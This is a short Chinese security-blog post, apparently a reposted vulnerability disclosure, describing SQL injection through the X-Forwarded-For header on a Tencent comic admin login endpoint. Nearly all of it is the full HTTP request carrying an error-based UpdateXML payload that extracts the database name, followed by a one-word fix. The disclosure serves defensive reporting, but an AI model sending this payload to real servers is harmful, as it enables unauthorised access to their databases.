腾讯这是一个很经典的SQL注射 – 网站安全 – 自学

时间: 2020-10-10|tag: 11次围观|0 条评论

腾讯-这是一个很经典的SQL注射

GET /site/login?jsonpCallbackParam=loginJsonpCallback&data_info=1&ajax=true&_=1406730250627 HTTP/1.1

Host: admin.comic.qq.com

X-FORWARDED-FOR:192.168.1.1'+ (UpdateXML(1,CONCAT(0x5b,mid( (select database()) ,1,32),0x5d),1)) +'

http头注入

漏洞证明:

 

腾讯这是一个很经典的SQL注射 – 网站安全 – 自学插图

 

腾讯这是一个很经典的SQL注射 – 网站安全 – 自学插图1

 

修复方案:

过滤
    上一篇: 全球最大同性交友网全站用户数据告急(过狗直捣

    下一篇: DedeCMS-V5.7-UTF8-SP1 变反射为持久xss - 网站安全 - 自
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《腾讯这是一个很经典的SQL注射 – 网站安全 – 自学
   

还没有人抢沙发呢~